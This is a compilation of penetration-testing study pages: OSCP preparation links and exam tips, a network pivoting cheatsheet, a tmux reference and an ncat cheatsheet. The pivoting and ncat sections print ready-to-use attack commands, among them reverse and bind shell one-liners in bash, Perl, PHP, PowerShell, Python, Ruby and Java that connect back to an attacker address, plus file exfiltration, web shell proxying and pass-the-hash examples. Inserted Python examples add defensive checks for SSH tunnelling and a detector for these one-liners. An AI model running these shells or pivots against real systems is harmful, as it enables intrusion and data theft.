Writeups Database

OSCP-Review


If you are somewhat unfamiliar with these basics, here are some links to help you learn the required materials:

  • TCP/IP & Networking
    • Networking Basics: TCP, UDP, TCP/IP and OSI Model
    • Common Ports & Protocols
    • Security+ Section 1: Network Security
    • Nmap Basics
  • Linux & Bash Scripting
    • OverTheWire - Bandit
    • Bash Scripting Tutorial
    • Null Byte - Linux Basics
  • Python
    • Codecademy - Python
    • Python 2.7.14 Documentation

Practice:

Now that you have a fundamental understanding of the basics, you need to practice… a lot! If you are pretty new to Penetration Testing and think that taking the OSCP will teach you, then you are dead wrong! You need a lot of previous training and experience to even attempt something like the OSCP.

The following materials below will help you take the first steps into Penetration Testing, and for those who are already experienced, it will help you practice and expand your skills.

  • Videos
    • Cybrary - Penetration Testing and Ethical Hacking
    • Cybrary - Advanced Penetration Testing
    • Cybrary - Web Application Penetration Testing
  • Books
    • Penetration Testing: A Hands-On Introduction to Hacking
    • The Hacker Playbook 2: Practical Guide To Penetration Testing
    • The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws
    • Black Hat Python: Python Programming for Hackers and Pentesters
    • Hacking: The Art of Exploitation, 2nd Edition
  • Practice Labs
    • VulnHub
      • OSCP like VMs:
        • Kioptrix 1-5
        • FristiLeaks: 1.3
        • Stapler: 1
        • PwnLab: init
        • Brainpan: 1
        • Mr-Robot: 1
        • HackLab: Vulnix
        • VulnOS: 2
        • SickOS: 1.2
        • SkyTower: 1
    • HackTheBox
      • Practice on the Retired Machines too… trust me!
    • PentestIt (Advanced Only!)
    • CTF365
    • PentesterLab - Bootcamp
    • Exploit Exercises - Mainsequence
    • OverTheWire - Natas
  • Study Materials & Guides
    • Awesome Pentest
    • Security Notebook
    • Spawning a TTY (Interactive) Shell
    • Reverse Shell Cheat Sheet
    • Metasploit Fundamentals
    • Creating Metasploit Payloads
    • Windows Privilege Escalation
      • Windows Privilege Escalation Fundamentals
      • Windows Privilege Escalation - Checklist
      • Quick Notes
    • Linux Privilege Escalation
      • Basic Linux Privilege Escalation
      • Linux Privilege Escalation Scripts
      • Exploit Exercises - Nebula
    • Buffer Overflows
      • Exploit Writing Tutorial Part 1 : Stack Based Overflows
      • Exploit Writing Tutorial Part 2 : Stack Based Overflows – Jumping to Shellcode
      • Intro to x86 Assembly
      • Exploit Exercises - Protostar

I know that there is a ton of material here, and it might seem overwhelming at first, but many of these topics overlap once you begin studying offensive security. Remember, it takes time to learn. You need to enjoy the process of learning, or you will never get to your end goal! Take it slow, start with the basics, and work your way up.

Exam Tips:

As with everything, there are certain things you should know and do during the PWK Lab and OSCP Exam. The following tips should help you stay focused and steer clear of rabbit holes.

  1. Enumerate, Enumerate, Enumerate!
  2. Simple Nmap Scans w/ Script Scanning are your friends!
    • TCP: nmap -sS -sV -sC -n [IP]
    • UDP: nmap -sU -sV -n --top-ports 200 [IP]
  3. Enumerate SNMP (UDP 161) if it’s open!
    • snmp-check -t [IP] -c public
    • This will show other open ports/running services and applications!
  4. Enumerate SMB (TCP 139/TCP 445) if it’s open!
    • enum4linux [IP]
    • This will show open shares, anonymous logins, etc.
  5. Run nikto on interesting directories!
    • nikto -h http(s)://[IP]:[PORT]/[DIRECTORY]
  6. DirBuster over dirb. Opt for using the medium wordlist for better results!
    • /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
  7. Check for anonymous logins for FTP/SMB!
    • ftp [IP]
      • Username: anonymous Password: anonymous
    • smbclient -L //[IP]
      • Username: root Password: None
  8. Check for WebDav! Nmap script scan should pick it up! If not…
    • davtest -url http(s)://[IP]
  9. Don’t overthink it! Try low hanging fruit first!
    • Password the same as Username?
    • Username/Password combo of admin:admin?
    • Google the Documentation. Default Credentials/Login?
  10. Rotate machines every 3-4 hours. Don’t tire yourself out!
  11. Have an idea, but it seems impossible? Try it… you never know! =)
  12. Take frequent breaks. Opt for a 10 minute break every 2 hours.
  13. Eat and drink! Make time for Lunch, and Dinner. Your brain needs food to function.
  14. Limit caffeine intake, 1-2 cups of coffee is okay! But, drink Tea and Water.
  15. Don’t have any snacks next to you. If you’re hungry, walk to the kitchen for a snack, this will make you walk away from your PC and will help clear your mind.
  16. Breathe… relax… you've got 24 hours!
  17. Organize your notes, take screenshots, and document everything!
  18. A few days before the exam create and edit your report outline.
  19. In the PWK Lab, practice the Buffer Overflows till you can do them by heart and without notes.
  20. Don’t give up too easily, and most importantly… “Try Harder!”.

Network Pivoting Techniques


Basic Pivoting Types

Type                Use Case
Listen - Listen     Exposed asset, may not want to connect out.
Listen - Connect    Normal redirect.
Connect - Connect   Can’t bind, so connect to bridge two hosts.

Listen - Listen

Netcat - Pivot Host

ncat -v -l -p 8080 -c "ncat -v -l -p 9090"

Socat - Pivot Host

socat -v tcp-listen:8080 tcp-listen:9090

Remote host 1

We connect to the first side of the listen->listen trigger and send the file as input.

ncat localhost 8080 < file

Remote host 2

We connect to the second side of the listen->listen trigger and write the output to disk.

ncat localhost 9090 > newfile

Listen - Connect

Netcat - Pivot Host

ncat -l -v -p 8080 -c "ncat localhost 9090"

Socat - Pivot Host

socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090

Remote host 1

We connect to the listen side of the listen->connect trigger and send the file as input.

ncat localhost 8080 < file

Remote host 2

We wait and listen for the connect from the listen->connect trigger and write the file to disk.

ncat -l -p 9090 > newfile

Connect - Connect

Netcat - Pivot Host

Remote host listeners must be bound first.

ncat localhost 8080 -c "ncat localhost 9090"

Socat - Pivot Host

Remote host listeners must be bound first.

socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090

Remote Host 1

We bind and listen to port 8080 and send the file as input.

ncat -l -p 8080 < file

Remote Host 2

We bind and listen to port 9090 and write the data to disk.

ncat -l -p 9090 > newfile

SSH Tunnels

Dynamic SOCKS Proxy

This can be used with proxychains to forward client traffic through the remote server.

ssh -D8080 [user]@[host]

Local Port Forwarding

This will bind to [bindaddr]:[port] on the client and forward through the SSH server to the [dsthost]:[dstport]

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

This will bind to [bindaddr]:[port] on the remote server and tunnel traffic through the ssh client side to [localhost]:[localport]

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]

Establish VPN over SSH

The following options must be enabled on the server side (in sshd_config).

PermitRootLogin yes
PermitTunnel yes

ssh [user]@[host] -w any:any

You can see the established tun interface by typing ifconfig -a

The interfaces and forwarding must still be configured. This assumes that we are going to forward 10.0.0.0/24 through the remote server. We are also assuming that the server’s main connection is through eth0, and both client/server stood up tun0. This may be different if you already have existing VPN connections.

Client

ip addr add 192.168.5.2/32 peer 192.168.5.1 dev tun0
# Once Server is setup, run the following to add routes
route add -net 10.0.0.0/24 gw 192.168.5.1

Server

ip addr add 192.168.5.1/32 peer 192.168.5.2 dev tun0
sysctl -w net.ipv4.ip_forward=1
# NAT traffic arriving from the client's tunnel address (192.168.5.2) out through eth0
iptables -t nat -A POSTROUTING -s 192.168.5.2 -o eth0 -j MASQUERADE
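
From the defender's side, each SSH tunnel type above is gated by an sshd_config keyword. The following is an added example (not part of the original cheatsheet) that reads a config and reports which of the -D/-L, -R and -w tunnels the server would permit; the function names and both sample configs are constructed for illustration, and the defaults are assumed to be upstream OpenSSH's.

```python
# OpenSSH upstream defaults for the keywords that gate the tunnels above
# (assumption: distributions may ship different defaults).
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
    "permitrootlogin": "prohibit-password",
}

def effective_settings(config_text):
    """Global-scope values. sshd keeps the FIRST occurrence of a keyword."""
    settings, seen, has_match = dict(DEFAULTS), set(), False
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ", 1).split()   # "Key value" or "Key=value"
        key = parts[0].lower()                       # keywords are case-insensitive
        if key == "match":
            has_match = True    # simplification: Match blocks need manual review
            break
        if key in DEFAULTS and key not in seen and len(parts) > 1:
            seen.add(key)
            settings[key] = parts[1].lower()
    return settings, has_match

def tunnel_exposure(config_text):
    """Map the effective settings onto the tunnel types from this section."""
    s, has_match = effective_settings(config_text)
    fwd = s["allowtcpforwarding"]
    if fwd in ("yes", "all", "remote"):
        wide = s["gatewayports"] in ("yes", "clientspecified")
        remote = "any-address" if wide else "loopback-only"
    else:
        remote = "disabled"
    return {
        "local_and_dynamic": fwd in ("yes", "all", "local"),  # ssh -L / ssh -D
        "remote": remote,                                     # ssh -R bind scope
        "tun_device": s["permittunnel"] != "no",              # ssh -w
        "root_login": s["permitrootlogin"],
        "match_blocks": has_match,
    }

# Constructed sample: the two settings this page asks for, nothing else.
PAGE_CONFIG = """\
PermitRootLogin yes
PermitTunnel yes
"""

# Constructed sample: hardened server; the later duplicate is ignored by sshd.
HARDENED_CONFIG = """\
# bastion profile
PermitRootLogin no
AllowTcpForwarding no
permittunnel=no
PermitTunnel yes
Match User backup
    AllowTcpForwarding yes
"""

if __name__ == "__main__":
    for name, cfg in (("page", PAGE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, tunnel_exposure(cfg))
```

Note that sshd_config(5) itself points out that disabling TCP forwarding does not improve security unless users are also denied shell access, since they can run their own forwarders.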

Proxychains

The configuration file at /etc/proxychains.conf must be edited to point to your SOCKS proxy. Typically this is done with an SSH or other type of tunnel. Make sure your ports match.

[ProxyList]
socks4 localhost 8080

Now, in order to run any type of network tool through the proxy, just run it like so. Remember, you can’t run any raw socket scans through a SOCKS4 proxy. You need to set up an SSH VPN tunnel or something similar for that type of functionality.

proxychains nmap 192.168.5.6

Web Shell SOCKSProxy (reGeorg)

reGeorg is a fantastic tool for using SOCKS proxies through a compromised web server. The delivery mechanism can be aspx, ashx, jsp, or php. Simply upload the desired file to the webserver.

python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp

You are now free to use your regular tools using proxychains.

Meterpreter

Meterpreter allows you to create pivoting routes within the framework for use with any of the builtin modules. To automatically route, just use the following.

run autoroute -s 192.168.5.1/24

To print routes

run autoroute -p

Meterpreter - SOCKS Proxy

Now you can run other tools through Meterpreter using proxychains.

use auxiliary/server/socks4a
set SRVPORT 8080
run

Forward single ports

Below will forward rdesktop sessions from localhost port 3389 to the target 192.168.5.9 through Meterpreter as a tunnel.

portfwd add -L 127.0.0.1 -l 3389 -r 192.168.5.9 -p 3389

Rpivot

Rpivot is a great SOCKS proxy based pivot tool that works like SSH’s dynamic proxy -D option, but it works in the reverse order.

Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

The Server will now have a SOCKS proxy on port 1080 that will forward traffic through the [client].

Through corporate proxy

Rpivot also works through corporate proxies.

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

If you prefer passing the hash, then you’re also in luck.

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE

AutoSSH

AutoSSH is a tool that automatically restarts SSH sessions and tunnels. The following line will open port 2222 on host attacker and tunnel it to the compromised host on port 22. You would then be able to set up a dynamic SSH SOCKS proxy by connecting to localhost:2222, and forward through the compromised host as normal.

autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -R 2222:localhost:22 [evil]@[attacker]

References

  1. Red Team Pivoting Guide
  2. Proxy Chains
  3. rpivot
  4. reGeorg
  5. Metasploit
  6. Red Team Field Manual

Cheatsheet: tmux


Command line

  • tmux new -s {session_name} -n {name} - create new session and specify window name
  • tmux {attach|a|at} -t {session_name} - attach to session
  • tmux ls - list sessions
  • tmux kill-session -t {session_name} - kill session

Misc

  • Prefix ? - help
  • Prefix d - detach
  • Prefix t - big clock

Command mode

  • Prefix : - command mode
  • new-window -n {name} {command} - create new window and execute command

Sessions

  • :new - new session
  • Prefix s - list sessions
  • Prefix $ - name session
  • Prefix ( - previous session
  • Prefix ) - next session
  • Prefix L - last session

Windows

  • Prefix c - create new window
  • Prefix , - rename window
  • Prefix n - next window
  • Prefix p - previous window
  • Prefix {n} - go to window n
  • Prefix f - find window by name
  • Prefix w - list windows
  • Prefix & - kill window

Panes

  • Prefix % - split pane vertically (see tmux-pain-control)
  • Prefix " - split pane horizontally (see tmux-pain-control)
  • Prefix o - cycle through the panes
  • Prefix {arrow key} - navigate to specific pane (see tmux-pain-control)
  • Prefix space - cycle through layouts
  • Prefix x - close pane
  • Prefix q - show panes numbers
  • Prefix z - switch to whole window mode and back
  • Prefix { - move the current pane left (see tmux-pain-control)
  • Prefix } - move the current pane right (see tmux-pain-control)
  • :setw synchronize-panes - toggle panes synchronization

Copy mode (vi mode)

  • Prefix [ - start copy mode
  • Prefix ] - paste from copy mode
  • ^ - back to indentation
  • esc - clear selection
  • enter - copy selection
  • j - cursor down
  • h - cursor left
  • l - cursor right
  • k - cursor up
  • L - cursor to bottom line
  • M - cursor to middle line
  • H - cursor to top line
  • d - delete entire line
  • D - delete to end of line
  • $ - end of line
  • : - goto line
  • ⌃-d - half page down
  • ⌃-u - half page up
  • ⌃-f - next page
  • w - next word
  • p - paste buffer
  • ⌃-b - previous page
  • b - previous word
  • q - quit mode
  • ⌃-down, ⌃-j - scroll down
  • ⌃-up, ⌃-k - scroll up
  • n - next search match
  • ? - search backward
  • / - search forward
  • 0 - start of line
  • space - start selection

Settings

  • set -g mode-mouse on - enable mouse support (tmux older than 2.1; newer versions use set -g mouse on)

Plugins

tmux-copycat

https://github.com/tmux-plugins/tmux-copycat

  • prefix + / - regex search (strings work too)

Predefined searches

  • prefix + ctrl-f - simple file search
  • prefix + ctrl-g - jumping over git status files (best used after git status command)
  • prefix + alt-h - jumping over SHA-1 hashes (best used after git log command)
  • prefix + ctrl-u - url search (http, ftp and git urls)
  • prefix + ctrl-d - number search (mnemonic d, as digit)
  • prefix + alt-i - ip address search

tmux-open

https://github.com/tmux-plugins/tmux-open

  • o - “open” a highlighted selection with the system default program. open for OS X or xdg-open for Linux.
  • ⌃-o - open a highlighted selection with the $EDITOR

tmux-pain-control

https://github.com/tmux-plugins/tmux-pain-control

Navigation

  • Prefix + h, Prefix + C-h - select pane on the left
  • Prefix + j, Prefix + C-j - select pane below the current one
  • Prefix + k, Prefix + C-k - select pane above
  • Prefix + l, Prefix + C-l - select pane on the right

Resizing

  • Prefix + shift + h - resize current pane 5 cells to the left
  • Prefix + shift + j - resize 5 cells in the up direction
  • Prefix + shift + k - resize 5 cells in the down direction
  • Prefix + shift + l - resize 5 cells to the right

Splitting

  • Prefix | split panes by vertical
  • Prefix - split panes by horizontal

Swapping panes

  • Prefix < moves current pane one position to the left
  • Prefix > moves current pane one position to the right

tmux-resurrect

https://github.com/tmux-plugins/tmux-resurrect

  • Prefix ⌃-s - save
  • Prefix ⌃-r - restore

tmux-yank

https://github.com/tmux-plugins/tmux-yank

  • Prefix y - copies text from the command line to clipboard

copy mode

  • y - copy selection to system clipboard
  • Y - copy selection and paste it to the command line

vim-tmux-navigator

https://github.com/christoomey/vim-tmux-navigator

  • ⌃-h - Left
  • ⌃-j - Down
  • ⌃-k - Up
  • ⌃-l - Right
  • ⌃-\ - Previous split

tmuxinator

https://github.com/tmuxinator/tmuxinator

tmux-sensible

https://github.com/tmux-plugins/tmux-sensible

tpm

https://github.com/tmux-plugins/tpm


The content on this site represents my own personal opinions and thoughts at the time of posting.

Content licensed under the Creative Commons CC BY 4.0.

Ncat Cheatsheet


Man Page

Name
ncat — Concatenate and redirect sockets

Synopsis
ncat [ <OPTIONS> ...] [ <hostname> ] [ <port> ]

Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 80

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Dec 2017 20:01:10 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://bitrot.sh/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

SSL Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 443 --ssl

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Dec 2017 20:01:59 GMT
Content-Type: text/html
Content-Length: 28379
Last-Modified: Tue, 19 Dec 2017 15:31:41 GMT
Connection: close
ETag: "5a3930dd-6edb"
Accept-Ranges: bytes

<!DOCTYPE html>
<html lang="en">
...

Simple Web Server

echo '<html><body>This is ncat webserver</body></html>' > stuff.html
ncat -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat stuff.html"

Once the ncat command is running, open a web browser and point it to localhost on port 8080.

Accept multiple requests

ncat --keep-open -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/stuff.html"

A Better HTTP Server

There’s a neat Lua script that takes advantage of ncat’s ability to interact with the language. The script can be found here. Try saving it to /tmp/httpd.lua

Navigate to a directory with .html files in it, and run the following command.

ncat -l -p 8080 --lua-exec /tmp/httpd.lua --keep-open

Unwrap SSL Connections

Server

Listen on port 6666 as a plain text server. Upon connection, connect to api.ipify.org:443 using SSL and forward client / server traffic. It also saves the full session to out.log for later analysis.

ncat -l -p 6666 -c 'ncat --ssl api.ipify.org 443' --keep-open -o out.log

Client

Grab our remote IP address by using an HTTP connection to localhost:6666, which handles the connection to api.ipify.org:443 using SSL.

curl 'http://localhost:6666?format=json' -H 'Host: api.ipify.org'

Connect two incoming connections

ncat -l -p 8080 -c 'ncat -l -p 9090'

Connect two listening servers

This can have some very interesting results.

ncat localhost 8080 -c 'ncat localhost 9090'

For more, check out our pivoting cheatsheet.

Telnet

ncat -t 192.168.1.1 23

Simple Chat

Server

ncat -l 1234 --chat

Client(s)

ncat localhost 1234

Copy Files with UDP

Server

ncat -l 6666 --udp

Client

ncat --udp localhost 6666 < stuff.py

Access Controls

Whitelist IPs

ncat -l -p 8080 --allow 192.168.1.1

Whitelist from file

Hosts should be separated by new lines

ncat -l -p 8080 --allowfile hosts

Blacklist IPs

ncat -l -p 8080 --deny 192.168.1.1,10.10.0.1

Blacklist IPs from file

Hosts should be separated by new lines

ncat -l -p 8080 --denyfile hosts

File Transfer with SSL

Reverse file transfer to attacker

Attacker

ncat -l -p 6666 --ssl > outputfile

Victim

ncat --ssl --send-only <attacker ip> 6666 < /bin/ncat

File send w/ Sender listening

Attacker

ncat -l --ssl -p 6666 --send-only < /bin/ncat

Victim

ncat localhost 6666 --ssl > outputfile

Bind Shell

Linux

ncat -l 6666 -e /bin/sh

Windows

ncat -l 6666 -e cmd

Reverse Shell

Victim

ncat <attacker ip address> 6666 -e /bin/sh

Attacker

ncat -l -p 6666

Victim machine doesn’t have ncat?

Bash

bash -i >& /dev/tcp/<attacker ip address>/6666 0>&1

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP

php -r '$sock=fsockopen("10.0.0.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

PowerShell

$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("<attacker ip address"),<listening port>);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()

Python 2.7 and 3

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker ip address>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

ProTip: This may become a lot easier on Windows and OSX hosts in the future if Microsoft adds Python as a language for Excel

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 6666

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

We need to modify /etc/X11/Xwrapper.config and change the allowed_users line to look like this. This file often gets overwritten on updates. After the file has been saved, restart the X11 login manager.

allowed_users=anybody

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest -ac :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip
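
The one-liners in this cheatsheet leave recognisable process command lines, which is what endpoint telemetry keys on. The following is an added example (not part of the original cheatsheet) that matches them with heuristic regex rules over process-creation records; the rule names, the (host, cmdline) record shape and the sample events are constructed for illustration.

```python
import re

# Heuristic rules modelled on the command lines shown in this cheatsheet.
RULES = [
    # ncat/nc handing the socket to a program: -e/--exec, -c/--sh-exec, --lua-exec
    ("ncat-exec", re.compile(
        r"\b(?:ncat|netcat|nc)(?:\.exe)?\b.*"
        r"\s(?:-e|--exec|-c|--sh-exec|--lua-exec)\s+\S")),
    # bash pseudo-device used as a TCP client
    ("bash-dev-tcp", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    # inline interpreter code that opens a socket, then spawns or rewires a process
    ("interpreter-socket-shell", re.compile(
        r"\b(?:python[\d.]*\s+-c|perl\s+-e|php\s+-r|ruby\s+.*-rsocket)\b.*"
        r"(?:socket|fsockopen).*(?:exec|dup2|subprocess)", re.I)),
    # socat joining two TCP endpoints (listen/listen, listen/connect, connect/connect)
    ("socat-relay", re.compile(
        r"\bsocat\b.*\btcp-(?:listen|connect):\S+\s+tcp-(?:listen|connect):", re.I)),
    # xterm drawing on a remote X display (host:n), not the local ":0"
    ("xterm-remote-display", re.compile(r"\bxterm\b.*-display\s+[^\s:]+:\d+")),
]

def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """events: iterable of (host, cmdline). Returns only the suspicious ones."""
    hits = []
    for host, cmdline in events:
        names = classify(cmdline)
        if names:
            hits.append((host, names, cmdline))
    return hits

# Constructed sample telemetry: five suspicious lines and three benign ones.
SAMPLE_EVENTS = [
    ("web01", "ncat 10.0.0.1 6666 -e /bin/sh"),
    ("web01", "bash -i >& /dev/tcp/10.0.0.1/6666 0>&1"),
    ("db02", "python -c 'import socket,subprocess,os;s=socket.socket();"
             "os.dup2(s.fileno(),0)'"),
    ("db02", "socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090"),
    ("ws07", "xterm -display 10.0.0.1:1"),
    ("ws07", "nc -zv 10.0.0.5 22"),                       # plain port check
    ("ws07", "python3 -c 'import socket; print(socket.gethostname())'"),
    ("ws07", "ncat -l -p 8080 --allow 192.168.1.1"),      # listener, no exec
]

if __name__ == "__main__":
    for host, names, cmdline in scan(SAMPLE_EVENTS):
        print(f"{host}: {','.join(names)}: {cmdline}")
```

String matching on command lines is easy to evade by renaming binaries or encoding arguments, so rules like these work best alongside network-side signals such as unexpected outbound connections from server processes.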

Resources

http://www.irongeek.com/i.php?page=videos/ncat-nmap-netcat

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://github.com/Snifer/security-cheatsheets/blob/master/reverse-shell

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdpOneLine.ps1
